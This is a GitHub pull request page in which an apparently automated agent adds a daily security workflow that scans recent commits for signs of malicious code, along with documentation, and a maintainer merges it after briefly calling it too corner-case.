Skip to content

Comments

Add Daily Malicious Code Scan workflow#183

Merged
dsyme merged 2 commits intomainfrom
add-malicious-code-scan-57413046a78d2d3c
Feb 21, 2026
Merged

Add Daily Malicious Code Scan workflow#183
dsyme merged 2 commits intomainfrom
add-malicious-code-scan-57413046a78d2d3c

Conversation

@github-actions
Copy link
Contributor

@github-actions github-actions bot commented Feb 21, 2026

This PR adds a new Daily Malicious Code Scan security workflow, along with its documentation page and README entry.

Phase 1: Consistency Check

No inconsistencies were found between ./workflows/, ./docs/, and README.md. All workflow files have matching docs pages and README entries.

Phase 2: New Workflow — Daily Malicious Code Scan

Source

Adapted from daily-malicious-code-scan.md in the gh-aw repository.

Merge Rate

The security workflow family is documented in the [Security-related Workflows blog post]((github.github.io/redacted) The Daily Malicious Code Scan complements other security tools (CodeQL, Dependabot) with change-focused analysis of recent commits.

Why It's Valuable

As AI-assisted code generation becomes common, new supply chain risks emerge — a compromised agent or dependency could silently inject credential-harvesting code, a crypto miner, or a backdoor. This workflow:

  • Runs daily and scans all files changed in the last 3 days
  • Looks for secret exfiltration patterns, suspicious network calls, obfuscated code, out-of-context additions, and privilege escalation
  • Reports findings as GitHub native code-scanning alerts (visible in the Security tab alongside CodeQL and Dependabot)
  • Provides threat scores and actionable remediation steps
  • Works with any programming language — no configuration required

Generalization Plan

The original workflow contained Go-specific file location checks (e.g., verifying Go files are inside cmd/ or pkg/ directories). These were replaced with language-agnostic checks:

  • Removed: Go-specific directory structure validation
  • Added: General checks for executable files added to source directories
  • Added: General base64 payload detection pattern
  • Kept: Core secret exfiltration, suspicious network, system operations, and obfuscation detection logic unchanged
  • Kept: create-code-scanning-alert output (GitHub native, works in any repo)

Files Changed

  • workflows/daily-malicious-code-scan.md — generalized workflow spec
  • docs/daily-malicious-code-scan.md — documentation page
  • README.md — new "Security Workflows" section with entry

Generated by Daily Repo Goal Achiever

@Copilot @github-actions
Add Daily Malicious Code Scan workflow
85008ec 
Adds a new security workflow that reviews recent code changes for
suspicious patterns indicating malicious activity or supply chain attacks.

The workflow scans all files changed in the last 3 days and looks for:
- Secret exfiltration patterns (credentials + external network calls)
- Out-of-context code additions (executables in source dirs, encoded payloads)
- Suspicious system operations (sensitive file access, privilege escalation)
- Code obfuscation (base64/hex payloads, obscure naming)

Findings are published as GitHub code-scanning alerts in the Security tab.

Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com>
@dsyme
Copy link
Contributor

dsyme commented Feb 21, 2026

THis is too corner case

@dsyme dsyme closed this Feb 21, 2026
@dsyme dsyme reopened this Feb 21, 2026
@dsyme dsyme marked this pull request as ready for review February 21, 2026 03:43
@dsyme dsyme merged commit 6e3afce into main Feb 21, 2026
1 check passed
@dsyme dsyme deleted the add-malicious-code-scan-57413046a78d2d3c branch February 21, 2026 03:44
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

@dsyme dsyme dsyme approved these changes

Assignees

No one assigned

Labels

automation factory hygiene

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

1 participant

@dsyme